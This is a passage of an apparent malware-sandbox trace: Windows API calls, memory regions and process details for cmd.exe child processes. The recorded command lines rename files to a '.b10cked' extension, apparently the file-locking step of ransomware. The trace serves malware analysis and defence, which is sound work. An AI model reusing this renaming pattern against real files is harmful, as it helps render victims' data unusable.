lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.890] SetErrorMode (uMode=0x0) returned 0x0 [0202.890] SetErrorMode (uMode=0x1) returned 0x0 [0202.890] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", nBufferLength=0x104, lpBuffer=0x30eec4, lpFilePart=0x30eeac | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", lpFilePart=0x30eeac*="MSWINW~2.HXN") returned 0x27 [0202.890] SetErrorMode (uMode=0x0) returned 0x1 [0202.890] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.890] _wcsicmp (_String1="MSWINW~2.HXN", _String2=".") returned 63 [0202.890] _wcsicmp (_String1="MSWINW~2.HXN", _String2="..") returned 63 [0202.890] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinw~2.hxn")) returned 0x2022 [0202.891] SetErrorMode (uMode=0x0) returned 0x0 [0202.891] SetErrorMode (uMode=0x1) returned 0x0 [0202.891] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", nBufferLength=0x104, lpBuffer=0x30f340, lpFilePart=0x30f0d8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", lpFilePart=0x30f0d8*="MSWINW~2.HXN") returned 0x27 [0202.891] SetErrorMode (uMode=0x0) returned 0x1 [0202.891] SetErrorMode (uMode=0x0) returned 0x0 [0202.891] SetErrorMode (uMode=0x1) returned 0x0 [0202.891] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x30f548, lpFilePart=0x30f0d8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked", lpFilePart=0x30f0d8*="MS.WINWORD.DEV.14.1033.hxn.b10cked") returned 0x3d [0202.891] SetErrorMode (uMode=0x0) returned 0x1 [0202.891] SetLastError (dwErrCode=0x0) [0202.891] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.winword.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0202.891] GetLastError () returned 0x2 [0202.891] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x30ea54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ea54) returned 0x4b0e90 [0202.891] FindNextFileW (in: hFindFile=0x4b0e90, lpFindFileData=0x30ea54 | out: lpFindFileData=0x30ea54) returned 0 [0202.892] FindClose (in: hFindFile=0x4b0e90 | out: hFindFile=0x4b0e90) returned 1 [0202.892] GetLastError () returned 0x12 [0202.892] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x30ea54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ea54) returned 0x4b0e90 [0202.892] FindNextFileW (in: hFindFile=0x4b0e90, lpFindFileData=0x30ea54 | out: lpFindFileData=0x30ea54) returned 0 [0202.892] FindClose (in: hFindFile=0x4b0e90 | out: hFindFile=0x4b0e90) returned 1 [0202.892] GetLastError () returned 0x12 [0202.893] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x4c1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1bf8) returned 0x4b0e90 [0202.893] FindNextFileW (in: hFindFile=0x4b0e90, lpFindFileData=0x4c1bf8 | out: lpFindFileData=0x4c1bf8) returned 0 [0202.893] FindClose (in: hFindFile=0x4b0e90 | out: hFindFile=0x4b0e90) returned 1 [0202.893] GetLastError () returned 0x12 [0202.893] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x4c1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1bf8) returned 0x4b0e90 [0202.893] FindNextFileW (in: hFindFile=0x4b0e90, lpFindFileData=0x4c1bf8 | out: lpFindFileData=0x4c1bf8) returned 0 [0202.893] FindClose (in: hFindFile=0x4b0e90 | out: hFindFile=0x4b0e90) returned 1 [0202.893] GetLastError () returned 0x12 [0202.893] _get_osfhandle (_FileHandle=2) returned 0xb [0202.893] GetFileType (hFile=0xb) returned 0x2 [0202.916] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.916] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30ec24 | out: lpMode=0x30ec24) returned 1 [0202.916] _get_osfhandle (_FileHandle=2) returned 0xb [0202.916] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x30ec58 | out: lpConsoleScreenBufferInfo=0x30ec58) returned 1 [0202.916] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.917] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30ec98 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.918] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x30ec7c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30ec7c*=0x2c) returned 1 [0202.918] longjmp () [0202.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.918] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.918] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.918] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.918] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.918] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.919] SetConsoleInputExeNameW () returned 0x1 [0202.919] GetConsoleOutputCP () returned 0x1b5 [0202.919] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.919] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.919] exit (_Code=1) Process: id = "486" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166e0" os_pid = "0xf64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29471 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29472 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29473 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29474 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29475 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29476 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29477 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29478 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29479 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 29480 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29806 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29807 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29808 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29809 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 29810 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 29811 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29812 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29813 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29814 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29815 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29816 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29817 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29818 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29819 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29820 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 29821 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29822 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29823 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29824 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29825 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 29826 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29827 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 29828 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 29829 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 29980 start_va = 0x12f0000 end_va = 0x13affff entry_point = 0x12f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 683 os_tid = 0xecc [0202.296] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc84 | out: lpSystemTimeAsFileTime=0x16fc84*(dwLowDateTime=0xad6447a0, dwHighDateTime=0x1d440a9)) [0202.296] GetCurrentProcessId () returned 0xf64 [0202.296] GetCurrentThreadId () returned 0xecc [0202.296] GetTickCount () returned 0x39194 [0202.296] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc7c | out: lpPerformanceCount=0x16fc7c*=25908561283) returned 1 [0202.297] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.297] __set_app_type (_Type=0x1) [0202.297] __p__fmode () returned 0x76b331f4 [0202.297] __p__commode () returned 0x76b331fc [0202.297] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.297] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.297] GetCurrentThreadId () returned 0xecc [0202.297] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xecc) returned 0x38 [0202.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.297] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.297] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.298] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.298] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fc14 | out: phkResult=0x16fc14*=0x0) returned 0x2 [0202.298] VirtualQuery (in: lpAddress=0x16fc4b, lpBuffer=0x16fbe4, dwLength=0x1c | out: lpBuffer=0x16fbe4*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.298] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fbe4, dwLength=0x1c | out: lpBuffer=0x16fbe4*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.298] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fbe4, dwLength=0x1c | out: lpBuffer=0x16fbe4*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.298] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fbe4, dwLength=0x1c | out: lpBuffer=0x16fbe4*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.298] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fbe4, dwLength=0x1c | out: lpBuffer=0x16fbe4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.298] GetConsoleOutputCP () returned 0x1b5 [0202.298] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.298] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.298] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.298] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.298] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.299] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.299] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.299] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.299] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.299] GetEnvironmentStringsW () returned 0x2b0160* [0202.299] FreeEnvironmentStringsW (penv=0x2b0160) returned 1 [0202.299] GetEnvironmentStringsW () returned 0x2b0160* [0202.299] FreeEnvironmentStringsW (penv=0x2b0160) returned 1 [0202.299] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb84 | out: phkResult=0x16eb84*=0x40) returned 0x0 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x88, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x1, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x1, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x0, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x40, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x40, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x40, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.300] RegCloseKey (hKey=0x40) returned 0x0 [0202.300] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb84 | out: phkResult=0x16eb84*=0x40) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x40, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x1, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x1, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x0, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x9, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x9, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x9, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.300] RegCloseKey (hKey=0x40) returned 0x0 [0202.300] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.300] srand (_Seed=0x5b8863a4) [0202.300] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked\"" [0202.300] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked\"" [0202.300] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.300] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18c0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.300] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.301] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.301] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.301] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.301] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.301] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.301] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.301] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.301] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.301] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.301] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.301] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.301] GetEnvironmentStringsW () returned 0x2b22b0* [0202.301] FreeEnvironmentStringsW (penv=0x2b22b0) returned 1 [0202.301] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.301] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.301] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.301] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.301] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.301] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.301] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.301] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.301] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.301] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.301] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f950 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.301] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f950, lpFilePart=0x16f94c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f94c*="Desktop") returned 0x18 [0202.301] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.301] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f6cc | out: lpFindFileData=0x16f6cc) returned 0x2afff0 [0202.302] FindClose (in: hFindFile=0x2afff0 | out: hFindFile=0x2afff0) returned 1 [0202.302] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f6cc | out: lpFindFileData=0x16f6cc) returned 0x2afff0 [0202.302] FindClose (in: hFindFile=0x2afff0 | out: hFindFile=0x2afff0) returned 1 [0202.302] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f6cc | out: lpFindFileData=0x16f6cc) returned 0x2afff0 [0202.302] FindClose (in: hFindFile=0x2afff0 | out: hFindFile=0x2afff0) returned 1 [0202.302] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.302] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.302] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.302] GetEnvironmentStringsW () returned 0x2b2ad0* [0202.302] FreeEnvironmentStringsW (penv=0x2b2ad0) returned 1 [0202.302] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 